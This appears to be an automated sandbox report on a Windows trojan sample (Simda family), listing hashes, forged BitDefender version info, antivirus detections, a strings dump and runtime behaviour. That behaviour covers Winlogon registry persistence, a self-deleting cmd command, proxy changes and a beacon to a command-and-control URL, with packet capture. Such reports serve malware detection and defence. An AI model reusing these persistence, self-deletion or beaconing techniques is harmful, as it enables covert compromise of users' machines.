Analysis Date2013-09-11 22:59:08
MD58735f9748c2e3e9f281a66046f2ed483
SHA1fb52b0ef3387572b5169560a8e98c8936f0d33b8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0e38b199f130485e16ec54d68ea83cb7 sha1: 2228aada5c725fb5cc88e950fb8461371211d1fa size: 15872
Section.data md5: 1356a2ae3fb1c9e59cb890da6741f781 sha1: ba00d0ff0c3014e0d5eb7a8b7b2ed0ebbdae30a3 size: 13312
Section.idata md5: 6228d792baecd1df391c51d679c6a501 sha1: 2084083d1f09ae2832e50e02a1f86fc97e231427 size: 1024
Section.rsrc md5: ccdd4ea274f2c3f5ccb2f4a774b1677d sha1: 346d62880072c2363cd0aae97fd4f2034f66ce50 size: 6144
Timestamp2000-03-11 18:06:55
VersionLegalCopyright: tvWrrtw
FileVersion: 4.4.0.7
CompanyName: BitDefender
PrivateBuild: ejJpryw Outqxv Zrtvxuw
ProductName: spuyow Rxtvy yQszh Evqovt
ProductVersion: 2.1.6.7
FileDescription: bHyvkn yvodrvx Cknpedk Ovloqt
PEhash7bb7a2d834b83da4348b01a5b2536e930d9a8e8d
AVavgPSW.Generic11.CKRI
AVmsseTrojan:Win32/Simda.gen!A
AVaviraTR/ATRAPS.Gen

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\userinit ➝
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\661f5edc.exe,\\x00
Creates File\\?\globalroot\systemroot\system32\661f5edc.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c del C:\FB52B0~1.EXE >> NUL
Creates ProcessC:\WINDOWS\system32\661f5edc.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\FB52B0~1.EXE >> NUL

Creates FileNUL
Deletes FileC:\malware.exe

Process
↳ C:\WINDOWS\system32\661f5edc.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
Creates FileC:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\nt4409.tmp
Deletes FileC:\WINDOWS\TEMP\nt4409.tmp
Creates Mutexc:!windows!system32!config!systemprofile!local settings!history!history.ie5!
Creates Mutexc:!windows!system32!config!systemprofile!cookies!
Creates Mutexc:!windows!system32!config!systemprofile!local settings!temporary internet files!content.ie5!
Winsock DNSbeistellened.com

Network Details:

DNSbeistellened.com
Type: A
173.230.158.166
HTTP GEThttp://beistellened.com/knock.php?n=C059900A&s=seller-29
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 173.230.158.166:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6e6f 636b2e70 68703f6e   GET /knock.php?n
0x00000010 (00016)   3d433035 39393030 4126733d 73656c6c   =C059900A&s=sell
0x00000020 (00032)   65722d32 39204854 54502f31 2e300d0a   er-29 HTTP/1.0..
0x00000030 (00048)   486f7374 3a206265 69737465 6c6c656e   Host: beistellen
0x00000040 (00064)   65642e63 6f6d0d0a 0d0a                ed.com....


Strings
0*0j`q
`02a$0Gxta
0i 7A_PT6
0nP@cP6
& 0QIw
0s7E`:
0S@P-\@
0sw/ 6F@
1gEN"v03dH
1H0nj`S
@1iF|8v
1Rich77
2202 c
3jum02P4UpTjp
'4L3, /
4@SwtnV
>60RPZJ
7p0B2P`2 
7P6oD84fz6
8@@CXl
90xB)jDuMc3
@9Lz`P
,9N=iw
9YP@B-9k
aDsjKejxp@0_`7R%
Au hOp
BgEH'@
@`bg:PAR
BLcaz1
>BP rxM0^e
c``0KP
CopyFileExW
>CprCPCpb
`{CUkpL
d0p~ omwi
`.data
dCXT79
ddhjw8,h
DosDateTimeToFileTime
+dxN(1P
EnableWindow
EnumChildWindows
eTygyW
EU%5Ok
{eW=".
eWDXx0
FindAtomA
F-<pxoE@
!"F)S=
g?8LKUp
GDPpJ@MQw
GetACP
GetActiveWindow
GetCapture
GetClassInfoExA
GetCommandLineA
GetCPInfo
GetCursorPos
GetDiskFreeSpaceA
GetProcessHeaps
GetQueueStatus
GetVersion
GetWindowTextLengthA
GlobalAlloc
[GS%-]
GX}`D$G
HbP0/@VAm'
hH^M@h{u
hPvmts
`H;xOw]
I9MODxa
.idata
I	@V`J
IvopSD
 =.ixf
J` gfWi
JqhTOC
K0gp	W
?k5k eEw
kernel32.dll
KlPv@0q
k@S2)L
l@bmP`
``LmzEl
lPpc`i
LQ5FS7
lstrcmpA
lstrcmpiA
lstrcmpW
lstrcpyn
lstrcpynW
lstrlen
M0d2Yj l
ME`0Tq
MessageBoxIndirectA
MultiByteToWideChar
n9PpTf 
-NPPYx
o@GXYZ
OMh06lh0`
OpenMutexA
O=UXILw
oYecmB
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PdP3Sv]SO
pep p@x
P gH0Wq2e
PNA@9k
P%OGPy
PPoAN 
P	pXFPx
Py3Ey8
qDy(0v
qJL/ P
Qm095q
Q@rc}@
QSYrIj
QVf[L7^S
R0Pgt0
rdSepD
RemoveDirectoryW
rphepg
@.rsrc
RUoSNpI1 
SetScrollPos
s`IiPZ
s@KY0P
skzXl3W
@SNmqI
SQqyeX4K0kM94BEwQhdkukiVkULKSQOGjeOhjdyLzkFY8qQULvMkBe2gMTNuZmpkKO8VFXMNIA2WFlPKipkR2e9DTaymArR9axvVZVqNiWdUAC4ZlXgKRzsmQ4In17QPqHjjAl4ozAncw66CbpbHR5fweIUe0xqSZwmpZ93Llkk00UcEvdzDodSxrhZeenGWAGgfSyeJ7rGQnj7dhVv1ACkYMZShs05IulBkwYv6oGur39cGnrXInsNkYc96lnePcc8vXRHKcpf1jxIS5ZI4WPAD4K7mWYFTsxIvBECHS6t96aJUhHt6FM7eRNyKEJnDgHXv4J7Tch0F3ivNkrvDyM4klIxfgJUxs3LAdSpCP5qIMTRoEtcA9OxtxfVXnoZZGJIZwzUp0OV6QvWKwR6jbIPaagYTymPwpxOVycsK1Ubr2pLN9YS61ZtcmlRVy87UuMpd
t4O"Kpl
tF `k,8T
!This program cannot be run in DOS mode.
t;Hlvp
TJKhRA
TqLapg1
- txnJq3
ua\l{S
user32.dll
v40hdT
 v.EXp
Vh@ pL
VirtualAlloc
V`JlduH5
vogaHJ
Vt  0o0p
X0d<7Q
#X6UvP
x7@0lp
`x-qoK
.x@Tmu
:=z`CQO[5cN
Zno0E9
z@:PvmXPP
%ZpxKI
zt<0BMuFy